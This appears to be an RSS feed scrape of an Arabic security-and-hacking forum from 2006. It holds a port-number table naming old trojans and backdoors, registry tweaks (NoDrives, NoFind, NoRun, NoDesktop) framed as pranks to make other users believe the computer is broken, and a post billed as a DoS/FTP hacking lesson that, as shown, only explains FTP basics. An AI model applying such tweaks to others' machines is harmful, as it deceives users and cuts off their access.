<br />
139<br />
TCP UDP<br />
Netbios session (DoS attacks)<br />
Info<br />
<br />
146<br />
TCP <br />
Infector 1.3<br />
Info<br />
<br />
421<br />
TCP<br />
Tcp Wrappers<br />
<br />
456 <br />
TCP<br />
Hacker's Paradise<br />
<br />
531<br />
TCP<br />
Rasmin<br />
<br />
555<br />
TCP<br />
Stealth Spy, Phaze <br />
<br />
666<br />
TCP<br />
Attack FTP<br />
<br />
777<br />
TCP<br />
AIM Spy Application<br />
<br />
911<br />
TCP<br />
Dark Shadow<br />
<br />
999<br />
TCP<br />
DeepThroat<br />
<br />
9400<br />
TCP<br />
InCommand<br />
<br />
9999<br />
TCP<br />
The prayer 1.2 -1.3<br />
<br />
1000<br />
TCP<br />
Der Spaeher<br />
<br />
1001<br />
TCP<br />
Silencer, WebEx<br />
<br />
1011 <br />
TCP<br />
Doly Trojan<br />
<br />
1012 <br />
TCP<br />
Doly Trojan<br />
<br />
1015<br />
TCP<br />
Doly Trojan<br />
<br />
1024 <br />
TCP<br />
NetSpy<br />
<br />
1025<br />
UDP<br />
Maverick's Matrix 1.2 - 2.0<br />
<br />
1027<br />
TCP<br />
ICQ<br />
<br />
1029<br />
TCP<br />
ICQ<br />
<br />
1032<br />
TCP<br />
ICQ<br />
<br />
1033<br />
TCP<br />
NetSpy<br />
<br />
1042<br />
TCP<br />
Bla<br />
<br />
1045<br />
TCP<br />
Rasmin<br />
<br />
1080<br />
TCP<br />
Socks/Wingate<br />
Info<br />
<br />
1090<br />
TCP<br />
Xtreme<br />
<br />
1170 <br />
TCP<br />
Voice Streaming Audio<br />
<br />
1207<br />
TCP<br />
SoftWar<br />
<br />
1234<br />
TCP<br />
Ultors Trojan<br />
Info<br />
<br />
1243<br />
TCP<br />
Sub Seven<br />
Info<br />
<br />
1245 <br />
TCP<br />
VooDoo Doll<br />
<br />
1269<br />
TCP<br />
Maverick's Matrix<br />
<br />
12631<br />
TCP<br />
WhackJob<br />
<br />
1349<br />
UDP<br />
BackOrifice DLL Comm<br />
<br />
1394<br />
TCP<br />
GoFriller, Backdoor G-1<br />
<br />
1492 <br />
TCP<br />
FTP99CMP<br />
<br />
1505<br />
TCPUDP<br />
FunkProxy <br />
Info<br />
<br />
1509<br />
TCP<br />
Psyber Streaming server<br />
<br />
1600<br />
TCP<br />
Shivka-Burka<br />
<br />
1604<br />
TCP UDP <br />
ICA Browser<br />
Info<br />
<br />
1807<br />
TCP<br />
SpySender<br />
<br />
1981<br />
TCP<br />
Shockrave<br />
<br />
1999 <br />
TCP<br />
BackDoor<br />
<br />
2000<br />
TCP<br />
Remote Explorer<br />
<br />
2001 <br />
TCP<br />
Trojan Cow<br />
<br />
2002<br />
TCP<br />
TransScout<br />
<br />
2003<br />
TCP<br />
TransScout<br />
<br />
2004<br />
TCP<br />
TransScout<br />
<br />
2005<br />
TCP<br />
TransScout<br />
<br />
2023 <br />
TCP<br />
Ripper<br />
<br />
2086<br />
TCP<br />
Netscape/Corba exploit<br />
<br />
2115 <br />
TCP<br />
Bugs<br />
<br />
2140 <br />
TCP<br />
Deep Throat<br />
<br />
2140<br />
UDP<br />
Deep Throat<br />
<br />
2155<br />
TCP<br />
Illusion Mailer<br />
<br />
2283<br />
TCP<br />
HLV Rat5<br />
<br />
2565 <br />
TCP<br />
Striker<br />
<br />
2583 <br />
TCP<br />
WinCrash<br />
<br />
2716<br />
TCP<br />
The Prayer 1.2 -1.3<br />
<br />
2721<br />
TCP<br />
Phase Zero<br />
<br />
2801 <br />
TCP<br />
Phineas Phucker<br />
<br />
2989<br />
UDP<br />
Rat<br />
<br />
3024 <br />
TCP<br />
WinCrash<br />
<br />
3028<br />
TCP<br />
Ring Zero<br />
<br />
3129 <br />
TCP<br />
Master's Paradise<br />
<br />
3150 <br />
TCP<br />
Deep Throat<br />
<br />
3150<br />
UDP<br />
Deep Throat<br />
<br />
3459<br />
TCP<br />
Eclipse 2000<br />
<br />
3700 <br />
TCP<br />
Portal of Doom<br />
<br />
3791<br />
TCP<br />
Eclypse<br />
<br />
3801<br />
UDP<br />
Eclypse<br />
<br />
4100<br />
TCP<br />
Watchguard Firebox admin DoS Expl<br />
Info<br />
<br />
4092 <br />
TCP<br />
WinCrash<br />
<br />
4567<br />
TCP<br />
File Nail<br />
<br />
4590 <br />
TCP<br />
ICQ Trojan<br />
<br />
5000 <br />
TCP<br />
Sokets de Trois v1.<br />
<br />
5001<br />
TCP<br />
Sokets de Trois v1.<br />
<br />
5011<br />
TCP<br />
Ootlt<br />
<br />
5031<br />
TCP<br />
Net Metropolitan 1.0<br />
<br />
5032<br />
TCP<br />
Net Metropolitan 1.04<br />
<br />
5321<br />
TCP<br />
Firehotcker<br />
<br />
5400 <br />
TCP<br />
Blade Runner<br />
<br />
5401 <br />
TCP<br />
Blade Runner<br />
<br />
5402 <br />
TCP<br />
Blade Runner<br />
<br />
5521<br />
TCP<br />
Illusion Mailer<br />
<br />
5550<br />
TCP<br />
Xtcp<br />
<br />
5512<br />
TCP<br />
Xtcp<br />
<br />
5555<br />
TCP<br />
ServeMe<br />
<br />
5556<br />
TCP<br />
BO Facil<br />
<br />
5557<br />
TCP<br />
BO Facil<br />
<br />
5569 <br />
TCP<br />
Robo-Hack<br />
<br />
5637<br />
TCP <br />
PC Crasher<br />
<br />
5638<br />
TCP<br />
PC Crasher<br />
<br />
5714<br />
TCP<br />
WinCrash<br />
<br />
5741<br />
TCP<br />
WinCrash<br />
<br />
5742 <br />
TCP<br />
WinCrash<br />
<br />
6000 <br />
TCP<br />
The Thing 1.6<br />
<br />
6400<br />
TCP<br />
The Thing<br />
<br />
6667<br />
TCP<br />
Sub-7 Trojan (new icq notification) <br />
Info<br />
<br />
6669<br />
TCP<br />
Vampyre<br />
<br />
6670 <br />
TCP<br />
Deep Throat<br />
Info<br />
<br />
6671<br />
TCP<br />
Deep Throat<br />
Info <br />
<br />
6711<br />
TCP<br />
Sub Seven<br />
Info<br />
<br />
6712 <br />
TCP<br />
Sub Seven<br />
Info<br />
<br />
6713 <br />
TCP<br />
Sub Seven<br />
Info<br />
<br />
6723 <br />
TCP<br />
Mstream attack-handler<br />
Info<br />
<br />
6771 <br />
TCP<br />
Deep Throat<br />
Info<br />
<br />
6776<br />
TCP<br />
Sub Seven<br />
Info<br />
<br />
6838<br />
UDP<br />
Mstream Agent-handler<br />
Info<br />
<br />
6912<br />
TCP<br />
Sh*t Heap (not 69123)<br />
<br />
6939 <br />
TCP<br />
Indoctrination<br />
<br />
6969<br />
TCP<br />
Gate Crasher, Priority<br />
Info<br />
<br />
6970 <br />
TCP<br />
Gate Crasher<br />
<br />
7000 <br />
TCP<br />
Remote Grab<br />
<br />
7028<br />
TCP<br />
Unknown Trojan<br />
<br />
7028<br />
UDP<br />
Unknown Trojan<br />
<br />
7300<br />
TCP<br />
Net Monitor<br />
<br />
7301<br />
TCP<br />
Net Monitor<br />
<br />
7306 <br />
TCP<br />
Net Monitor<br />
<br />
7307 <br />
TCP<br />
Net Monitor<br />
<br />
7308 <br />
TCP<br />
Net Monitor<br />
<br />
7597<br />
TCP<br />
QaZ (Remote Access Trojan)<br />
Info<br />
<br />
7789 <br />
TCP<br />
ICKiller<br />
<br />
7983<br />
UDP<br />
MStream handler-agent<br />
Info<br />
<br />
8080<br />
TCP<br />
Ring Zero<br />
<br />
8787<br />
TCPUDP<br />
BackOrifice 2000<br />
<br />
8879<br />
TCPUDP<br />
BackOrifice 2000<br />
<br />
9325<br />
UDP<br />
MStream Agent-handler<br />
Info<br />
<br />
9872 <br />
TCP<br />
Portal of Doom<br />
<br />
9873 <br />
TCP<br />
Portal of Doom<br />
<br />
9874 <br />
TCP<br />
Portal of Doom<br />
<br />
9875 <br />
TCP<br />
Portal of Doom<br />
<br />
9876<br />
TCP<br />
Cyber Attacker<br />
<br />
9878<br />
TCP<br />
Trans Scout<br />
<br />
9989 <br />
TCP<br />
iNi-Killer<br />
<br />
10067<br />
TCP<br />
Portal of Doom<br />
Info<br />
<br />
10067<br />
UDP<br />
Portal of Doom<br />
Info<br />
<br />
10167<br />
TCP<br />
Portal of Doom<br />
Info<br />
<br />
10167<br />
UDP<br />
Portal of Doom<br />
Info<br />
<br />
10498<br />
UDP<br />
Mstream handler-agent<br />
Info<br />
<br />
10520<br />
TCP<br />
Acid Shivers<br />
<br />
10607<br />
TCP<br />
Coma<br />
<br />
10666<br />
TCP<br />
Ambush<br />
<br />
11000<br />
TCP<br />
Senna Spy<br />
<br />
11050 <br />
TCP<br />
Host Control<br />
<br />
11223<br />
TCP<br />
Progenic Trojan<br />
<br />
12076<br />
TCP<br />
GJamer<br />
<br />
12223<br />
TCP<br />
Hack'99, KeyLogger<br />
<br />
12345<br />
TCP<br />
Netbus, Ultor's Trojan<br />
<br />
12346<br />
TCP<br />
Netbus<br />
Info<br />
<br />
12456<br />
TCP<br />
NetBus<br />
Info<br />
<br />
12361<br />
TCP<br />
Whack-a-Mole<br />
<br />
12362<br />
TCP<br />
Whack-a-Mole<br />
<br />
12631<br />
TCP<br />
Whack Job<br />
<br />
12701<br />
TCP<br />
Eclypse 2000<br />
<br />
12754<br />
TCP<br />
Mstream attack-handler<br />
Info<br />
<br />
13000<br />
TCP<br />
Senna Spy<br />
<br />
13700<br />
TCP<br />
Kuang2 the Virus<br />
<br />
15104<br />
TCP<br />
Mstream attack-handler<br />
Info<br />
<br />
16484<br />
TCP<br />
Mosucker<br />
<br />
16959 <br />
TCP <br />
SubSeven DEFCON8 2.1 Backdoor Info <br />
16969<br />
TCP<br />
Priority<br />
<br />
17300<br />
TCP<br />
Kuang2 The Virus<br />
<br />
18753<br />
UDP<br />
Shaft handler to Agent<br />
Info<br />
<br />
20000<br />
TCP<br />
Millennium<br />
<br />
20001<br />
TCP<br />
Millennium<br />
<br />
20034<br />
TCP<br />
NetBus 2 Pro<br />
Info<br />
<br />
20203<br />
TCP<br />
Logged!<br />
<br />
20331<br />
TCP<br />
Bla Trojan<br />
<br />
20432<br />
TCP<br />
Shaft Client to handlers<br />
Info<br />
<br />
20433<br />
TCP<br />
Shaft Agent to handlers<br />
Info<br />
<br />
21554<br />
TCPUDP<br />
GirlFriend<br />
<br />
22222<br />
TCP<br />
Prosiak<br />
<br />
23456<br />
TCP<br />
EvilFTP, UglyFTP<br />
<br />
23476<br />
TCP<br />
Donald Dick<br />
Info<br />
<br />
23477<br />
TCP<br />
Donald Dick<br />
Info<br />
<br />
26274<br />
TCP<br />
Delta Source<br />
<br />
26274<br />
UDP<br />
Delta Source</div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29266</guid>
		</item>
		<item>
			<title>كيف تجنن مخترقيـن الجهاز ..؟؟</title>
			<link>https://kwety.net/vb/showthread.php?t=29265&amp;goto=newpost</link>
			<pubDate>Sun, 03 Sep 2006 13:57:04 GMT</pubDate>
			<description><![CDATA[--------------------------------------------------------------------------------

السلام عليكم ورحمة اللة وبركاتة وبــعـــد
كيف تجنن مخترقيـن الجهاز ..؟؟ !! 
او بطريقة اخرى كيف تقوم بأخفاء يعض الملفات في جهازك .!! 
يعتبر ملف الريجستيري من اهم الملفات في نظام التشغيل ويندوز, نظرا لما 
يحتويه هذا الملف من معلومات حيوية ومؤثرة في طريقة عمل الجهاز. لذا اذا اردت 
تجربة هذه الحيل فننصحك بالقيام بعمل نسخة احتياطية من ملف الريجستري قبل 
تجربة احد الحيل التالية. وتأكد انك بعد ان تقوم بأداء هذه الحيل على جهازك 
فلن يتجرأ احد على العبث بجهازك مرة اخرى. 
حيلة 1: اخفاء محركات الاقراص من جهاز الكمبيوتر 
قد تحتاج في بعض الاحيان الى اخفاء محركات الاقراص سواء كانت للاقراص المرنة 
او الضوئية "السي دي" او حتى المحرك الرئيسي للجهاز عن اعين الفضوليين, 
للقيام بذلك قم بفتح ملف الريجستيري وذلك بكتاب regedit في مربع تشغيل Run 
تحت قائمة ابدأ.. ثم انتقل او ابحث عن المفتاح التالي: 
HKEY-CURRENT-USER/Software/Microsoft/Windows/CurentVersion/Policies/Explorer قم بالضغط بزر الفأرة الايمن على النافذة التي تظهر لك على اليمين واختر 
New ثم DWORD Value واطلق على المدخل الجديد اسم NoDrives ثم قم بالنقر 
المزدوج على المدخل الجديد واعطه القيمة 3FFFFFF بعد ذلك اضغط مفتاح F5. اذهب 
الى جهاز الكمبيوتر لتفاجأ بأن جميع المحركات قد اختفت, ولاستعادة المحركات 
قم بحذق القيمة التي ادخلتها من ملف الريجستيري ـ قد يستدعي الامر احيانا 
اعادة تشغيل الجهاز من جديد لاستعادة الاعدادات القديمة ـ . 
حيلة 2: اخفاء الامر تشغيل Run وبحث Find من قائمة ابدأ 
قد يكون من المسلي احيانا اللعب بجهاز الكمبيوتر كجعل بعض الايقونات او 
الاوامر تختفي من اماكنها المعهودة مما يولد الشك في مستخدمي جهازك بأن هناك 
خللا في نظام التشغيل لديك. 
لحذف امر تشغيل وامر بحث من قائمة ابدأ قم بعمل التالي: قم بفتح ملف 
الريجستيري والذهاب الى المفتاح : 
HKEY-CURRENT-USER/Software/Microsoft/Windows/CurentVersion/Policies/Explorer قم بالضغط بزر الفأرة الايمن على النافذة التي تظهر لك على اليمين واختر 
New ثم DWORD Value واطلق على المدخل الجديد اسم NoFind ثم قم بالنقر المزدوج 
على المدخل الجديد واعطه القيمة 1 سيقوم هذا بإخفاء الامر بحث, وبالمثل 
بالنسبة للامر تشغيل قم بخلق قيمة كما في الخطوات السابقة ولكن اطلق عليها 
الاسم NoRum واعطها القيمة 1 بعد ذلك اضغط مفتاح F5 لتحديث محتويات 
الريجستيري. اذهب الى قائمة ابدأ لتجد ان الامرين تشغيل وبحث قد اختفيا.. 
لاستعادتهما قم بحذف المفتاحين الذين قمت بخلقهما في الريجستيري. 
حيلة 3: اخفاء جميع محتويات سطح المكتب ومنع المستخدم من الخروج من ويندوز 
اتريد ان ترعب مستخدمي جهازك وتوهمهم بأن هناك خللا في الجهاز.. اذا لماذا لا 
تجرب اخفاء جميع محتويات سطح المكتب.. للقيام بذلك اتبع نفس الخطوات السابقة 
المشروحة في حيلة 1 او 2 وقم بخلق قيمة DWORD Value باسم NoDesktop واعطها 
القيمة 1 ثم اضغط على مفتاح F5 >
]]></description>
			<content:encoded><![CDATA[<div><div align="center">--------------------------------------------------------------------------------<br />
<br />
السلام عليكم ورحمة اللة وبركاتة وبــعـــد<br />
كيف تجنن مخترقيـن الجهاز ..؟؟ !! <br />
او بطريقة اخرى كيف تقوم بأخفاء يعض الملفات في جهازك .!! <br />
يعتبر ملف الريجستيري من اهم الملفات في نظام التشغيل ويندوز, نظرا لما <br />
يحتويه هذا الملف من معلومات حيوية ومؤثرة في طريقة عمل الجهاز. لذا اذا اردت <br />
تجربة هذه الحيل فننصحك بالقيام بعمل نسخة احتياطية من ملف الريجستري قبل <br />
تجربة احد الحيل التالية. وتأكد انك بعد ان تقوم بأداء هذه الحيل على جهازك <br />
فلن يتجرأ احد على العبث بجهازك مرة اخرى. <br />
حيلة 1: اخفاء محركات الاقراص من جهاز الكمبيوتر <br />
قد تحتاج في بعض الاحيان الى اخفاء محركات الاقراص سواء كانت للاقراص المرنة <br />
او الضوئية &quot;السي دي&quot; او حتى المحرك الرئيسي للجهاز عن اعين الفضوليين, <br />
للقيام بذلك قم بفتح ملف الريجستيري وذلك بكتاب regedit في مربع تشغيل Run <br />
تحت قائمة ابدأ.. ثم انتقل او ابحث عن المفتاح التالي: <br />
HKEY-CURRENT-USER/Software/Microsoft/Windows/CurentVersion/Policies/Explorer قم بالضغط بزر الفأرة الايمن على النافذة التي تظهر لك على اليمين واختر <br />
New ثم DWORD Value واطلق على المدخل الجديد اسم NoDrives ثم قم بالنقر <br />
المزدوج على المدخل الجديد واعطه القيمة 3FFFFFF بعد ذلك اضغط مفتاح F5. اذهب <br />
الى جهاز الكمبيوتر لتفاجأ بأن جميع المحركات قد اختفت, ولاستعادة المحركات <br />
قم بحذق القيمة التي ادخلتها من ملف الريجستيري ـ قد يستدعي الامر احيانا <br />
اعادة تشغيل الجهاز من جديد لاستعادة الاعدادات القديمة ـ . <br />
حيلة 2: اخفاء الامر تشغيل Run وبحث Find من قائمة ابدأ <br />
قد يكون من المسلي احيانا اللعب بجهاز الكمبيوتر كجعل بعض الايقونات او <br />
الاوامر تختفي من اماكنها المعهودة مما يولد الشك في مستخدمي جهازك بأن هناك <br />
خللا في نظام التشغيل لديك. <br />
لحذف امر تشغيل وامر بحث من قائمة ابدأ قم بعمل التالي: قم بفتح ملف <br />
الريجستيري والذهاب الى المفتاح : <br />
HKEY-CURRENT-USER/Software/Microsoft/Windows/CurentVersion/Policies/Explorer قم بالضغط بزر الفأرة الايمن على النافذة التي تظهر لك على اليمين واختر <br />
New ثم DWORD Value واطلق على المدخل الجديد اسم NoFind ثم قم بالنقر المزدوج <br />
على المدخل الجديد واعطه القيمة 1 سيقوم هذا بإخفاء الامر بحث, وبالمثل <br />
بالنسبة للامر تشغيل قم بخلق قيمة كما في الخطوات السابقة ولكن اطلق عليها <br />
الاسم NoRum واعطها القيمة 1 بعد ذلك اضغط مفتاح F5 لتحديث محتويات <br />
الريجستيري. اذهب الى قائمة ابدأ لتجد ان الامرين تشغيل وبحث قد اختفيا.. <br />
لاستعادتهما قم بحذف المفتاحين الذين قمت بخلقهما في الريجستيري. <br />
حيلة 3: اخفاء جميع محتويات سطح المكتب ومنع المستخدم من الخروج من ويندوز <br />
اتريد ان ترعب مستخدمي جهازك وتوهمهم بأن هناك خللا في الجهاز.. اذا لماذا لا <br />
تجرب اخفاء جميع محتويات سطح المكتب.. للقيام بذلك اتبع نفس الخطوات السابقة <br />
المشروحة في حيلة 1 او 2 وقم بخلق قيمة DWORD Value باسم NoDesktop واعطها <br />
القيمة 1 ثم اضغط على مفتاح F5 &gt;</div></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29265</guid>
		</item>
		<item>
			<title>هجوم الدوس المخيف راااااااااااااااائع للاختراق بدون برامج</title>
			<link>https://kwety.net/vb/showthread.php?t=29263&amp;goto=newpost</link>
			<pubDate>Sun, 03 Sep 2006 13:54:32 GMT</pubDate>
			<description><![CDATA[لسلام عليكم و رحمة الله و بركاته

اقدم لكم شرح ممل جدا لاختراق الدوس على عدة دروس و المعروف و الاسم الادق

(اختراق الftp اختصار file transfeer protocol)............ 


مقدمة 

ظهرت خدمة بروتوكول نقل الملفات (FTP) في المراحل المبكرة من مسيرة الإنترنت، ولذلك فقد مرت بمراحل عديدة من التطوير للارتقاء بأدائها، ويعتقد الخبراء أن تطورها سيواكب تطور الإنترنت ويسير معها جنبا إلى جنب، مما سيعزز دورها في مستقبل التكنولوجيا في العالم السيبيري (cyber technology). 


ملاحظة: 

قد لا تؤدي عبارة خدمة بروتوكول نقل الملفات المعنى المطلوب منها، الذي ينص على أنها خدمة الإنترنت المستندة إلى بروتوكول نقل الملفات (Internet service based on File Transfer protocol)، وسعيا للاختصار نستخدم عبارة بروتوكول نقل الملفات أو خدمة نقل الملفات لتدل على المعنى نفسه. 

ماهو نقل الملفات FTP? 

FTP هي اختصار لكلمة File Transfer Protocol وتعني بروتوكول نقل الملفات، وهذه الخدمة هي احدى تسهيلات TCP/IP التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات FTP الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم تشغيل مختلفة وعليه فلديها أشكال Formats مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم به FTP, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفاً في أميركا الى جهازنا. 

ما هي خدمة بروتوكول نقل الملفات 

يُعد المصطلح FTP اختصاراً لبروتوكول نقل الملفات (File Transfer Protocol)، وهو طريقة سريعة لنقل الملفات (الكبيرة عادةً) بين أجهزة الكمبيوتر البعيدة عن بعضها والموجودة في شبكة تستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. 

ويتشابه بروتوكول نقل الملفات (FTP) مع بروتوكول نقل النص المترابط (HTTP) في كون كلا البروتوكولين ينقل الملفات من الأجهزة الخادمة البعيدة (remote servers)، ولكنهما يختلفان في أن بروتوكول نقل النص المترابط (HTTP) يستخدم المستعرض (Web browser) لعرض الملفات المنقولة على شاشة المستخدم، وتكون تلك الملفات ذات محتوى متعدد الوسائط (Multimedia) –هذا المحتوى الذي يُميز صفحات الويب- ، بينما يُخزِن بروتوكول نقل الملفات (FTP) الملفات المنقولة على القرص الصلب لجهاز المستخدم. 

وتبرز أهمية هذه الخدمة عند نقل الملفات الكبيرة التي يعجز البريد الإلكتروني عن نقلها. إذ يمكن لبروتوكول نقل الملفات أن يتعامل مع أي نوع من الملفات سواء أكان معقداً مثل ملفات لغة النص المترابط (HTML) المضغوطة (compressed) وملفات الرسوم (graphic files)، أم بسيطاً مثل الملفات النصية (text files). ويمكن أن تُنقَل هذه الملفات من أجهزة خادمة بعيدة وتُخزَّن على القرص الصلب لجهاز المستخدم عن طريق عملية التنزيل (downloading)، كما تظهر فائدة استخدام خدمة بروتوكول نقل الملفات عند تصميم موقع شخصي على الويب، والحاجة إلى نقل ملفات الموقع إلى الأجهزة الخادمة (servers) عن طريق عملية التحميل (uploading). ويختلف بروتوكول نقل الملفات (FTP) عن البروتوكولات الأخرى التي لا تعتمد على الإنترنت في نقل الملفات مثل: Kermit، وXMODEM، إضافة إلى ZMODEM. 


FTP الخادم و FTP المستفيد 


تعتمد خدمة (FTP) على مبدأ الخادم/المستفيد (client/server)، ويكون فيه خادم FTP عبارة عن خادم ملفات يعتمد بروتوكول (FTP) في تحميل وتنزيل الملفات على أدلته (directories) شرط وجود الصلاحية المحددة باسم تعريف خاص (ID) وكلمة مرور (password) . 

ومن الجدير بالذكر أن الملفات الموجودة في خادم (FTP) تكون مضغوطة، وبالتالي يكون استرجاعها أكثر سرعة وسهولة، وتتعدد صيغ الملفات المضغوطة المستعملة؛ إذ نجد: .arc ، و .cpt ، و .zip، و .Z، بينما تكون صِيغ ملفات الرسوم من مثل: ".gif، و .jpg"، أما الملفات المخزنة بصيغة ثنائية (binary files) فتكون صيغها من مثل: ".hqx، و .uu". وإلى جانب الملفات السابقة تحتوي الأجهزة الخادمة لبروتوكول ملفات “read me” التي تبتدئ أسماؤها عادة بالرمز "00"، وبالتالي تظهر هذه الملفات في بداية القائمة. وتنبع أهمية التمييز بين أنواع الملفات من أن خدمة بروتوكول نقل الملفات تستخدم تعليمات مختلفة تتمتع بمواصفات نقل متمايزة لكل نوع من تلك الأنواع. 

ومن جهة أخرى، فإنه يلزم لنقل الملفات باستخدام بروتوكول (FTP) وجود برنامج يدعى برنامج مستفيد FTP (FTP client)، وهو برنامج يُمَكِّن المستخدم من تنزيل وتحميل الملفات من وإلى موقع FTP ما عبر شبكة تَستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. وتوجد الكثير من التطبيقات التي تقوم بوظيفة مستفيد FTP وتُناسب مُختلف أنواع الأجهزة، ويمكن تنزيل الكثير منها مجاناً عن طريق الإنترنت. 



المستخدم (anonymous FTP) 


تسمح هذه الميزة للمستخدمين بالولوج إلى مواقع (FTP) دون الحاجة إلى التعريف بأنفسهم، إذ يمكنهم استخدام كلمة “anonymous” أو كلمة “ftp” على أنها اسم المستخدم (user-ID)، ويُوضع البريد الإلكتروني للمستخدم مكان كلمة مرور (password). ويغلب استخدام هذه الميزة في عمليات تنزيل الملفات من المواقع العامة التي توفرها بعض الجامعات والشركات الحكومية والخاصة على الإنترنت. ولكن مشكلة هذه المواقع تكمن في صعوبة الاتصال بها بسبب الضغط الكثيف عليها. 

لماذا خدمة بروتوكول نقل الملفات (FTP) بدلاً من البريد الإلكتروني ومستعرضات الويب؟ 

تتميز خدمة (FTP) عن البريد الإلكتروني (Email) بأمور عديدة فهي أكثر فعالية في نقل الملفات الكبيرة، كما أنها أسرع من البريد الإلكتروني، مما يكفل تنفيذ المهمة نفسها في زمن أقل من زمن نقلها عن طريق البريد الإلكتروني، وهذا يجعل خدمة بروتوكول نقل الملفات أوفر. 

أما ما يُميز خدمة بروتوكول نقل الملفات (FTP) عن مستعرضات الويب (Web browsers) فهو: 

• تستطيع خدمة (FTP) القيام بعملية تحميل الملفات (uploading)، إذ تنقل المعلومات وخاصة وثائق (HTML) إلى الخادم البعيد الذي تُخزن عليه صفحات الويب. 


• تَستخدِم خدمة (FTP) أوامرَ (commands) لإجراء عمليات التحديث (حذف، أو إعادة تسمية أو نقل أو نسخ) على الملفات الموجودة على الخادم. 


• تدعم خدمة (FTP) السرية (privacy)، إذ يكون للمستخدمين المرخصين كلمات مرور (passwords) تسمح لهم بالولوج إلى الخادمات البعيدة.


_-_Bonz0_-_ 04-18-2004 09:21 PM 

--------------------------------------------------------------------------------

علاقة (FTP) مع البريد الإلكتروني: 

بدأت تُستخدم مؤخراً طريقة أخرى لاسترجاع الملفات عن طريق خادم بريدي خاص لخدمة (FTP)، لا تحتاج فيها إلى برنامج مستفيد FTP (FTP client)، ولكن يكفي أن يكون لك حساب بخدمة البريد الإلكتروني (Email account)، إذ يقوم خادم بريد بروتوكول نقل الملفات بالعمليات التي تقوم بها خدمة نقل الملفات، ثمَّ تُرسَل النتيجة عن طريق البريد الإلكتروني إلى المستخدم، ولا تخفى فوائد هذا التوظيف لخدمة بروتوكول نقل الملفات في البريد الإلكتروني لما تقدمه من سرعة وضمان في نقل الملفات الكبيرة، لم يكن بمقدور مستخدم البريد العادي الحصول عليها، وإليك فيما يلي أمثلة عن بعض الأجهزة الخادمة لبريد بروتوكول نقل الملفات (FTP): 



ftpmail@ppa.dec.com 
ftpmail@decwrl.dec.com 
ftpmail@src.doc.ic.ac.uk 



لولوج إلى (FTP) عن طريق مستعرضات الويب 

تُستخدَم مستعرضات الويب للولوج إلى ملفات موجودة في مواقع FTP، ويتم ذلك بسهولة عبر النقر على الروابط links. فللاتصال بموقع FTP تستبدل الحروف http في حقل العنوان (URL) بالحروف التالية ftp، ويكتب بعدها اسم الموقع (site name). ويمكن أن يُستخدم كل من:Netscape Navigator, Internet Explorer في الولوج إلى مواقع FTP، مع وجود الكثير من القيود التي لا يمكن حلها إلا بالحصول على التراخيص المناسبة. 


برامج مستفيد FTP 


يوجد العديد من برامج مستفيد FTP التي تعمل على أجهزة أي بي إم (IBM) أو الأجهزة المتوافقة معها، وتلائم العديد من أنظمة التشغيل (مثل: دوس (DOS)، وويندوز (Windows). كما إن نظم التشغيل الأحدث مثل ويندوز (Windows 95) 95 وويندوز (Windows 98) 98 وويندوز(Windows NT) NT تدعم خدمة بروتوكول نقل الملفات عبر برنامج خدمي (Utility program) هو ftp يظهر على شكل واجهة أوامر سطرية (command-line interface)؛ تشبه برنامج مستفيد FTP المُستخدم في نظام يوني** (Unix)، كما تستخدم أجهزة أخرى تعمل على نظام يوني** (Unix) برنامجَ مستفيد FTP آخر يدعى (NcFTP). 

كما توجد العديد من البرامج التي تعمل في بيئة رسومية تدعم خاصة السحب والإفلات (drag and drop)، ونذكر مثالين على هذه البرامج: 



• البرنامج WS FTP: للعمل على منصة التشغيل ويندوز (Windows). 


• البرنامج FETCH: للعمل على منصة التشغيل ماكنتوش (Macintosh). 


أقسام نقل الملفات: 

نقل الملفات ينقسم الى قسمين: 

=================== 

تنزيل الملفات Download: 

وهو جلب الملفات من الكمبيوتر المضيف Host الى الجهاز المحلي Local. 

ارسال الملفات Uplaod: 

وهو ارسال الملفات من الكمبيوتر المحلي Local الى الكمبيوتر المضيف Host. 

ومن الناحية الأمنية فهناك نوعان لنقل الملفات: 

نقل مؤمن Secure FTP: 


تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف. 


نقل مجهول Anonymous FTP: 


لاتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالباً استخدام guest أو anonymous عوضاً عنهما. 

تصنف مصادر البرامج على الانترنت الى ثلاثة أقسام: 

ملكية عامة Public Domain: 


وضعت البرامج هنا للاستخدام العام فليس هناك حقوق ملكية لأحد ولا قيود على استخدامها وتوزيعها وتعديلها. 


مصادر مجانية Freeware: 


يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ولا يجوز تعديلها أو بيعها. 


مصادر مشتركة Shareware: 


يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لاتتضمن جميع المميزات ويجب تحطيم النسخ بعد انتهاء مدتها. 

FTP والفيروسات: 


يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين: 


ASCII: 


اختصاراً لـ(American Standard Code for Information Interchange) والملفات من هذا النوع تحتوي على سبعة جزيئات bits تتراوح قيمتها بين الصفر و 127. ويستخدم هذا المصطلح للتعبير عن المعيار الذي يقوم بتحويل الأحرف الى أرقام في الكمبيوتر. وتستخدم الملفات النصية هذا النوع من الصيغ. 


Binary: 


وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات bits تتراوح بين الصفر و 255 وتندرج الصور والبرامج والملفات المضغوطة تحت هذا النوع. 

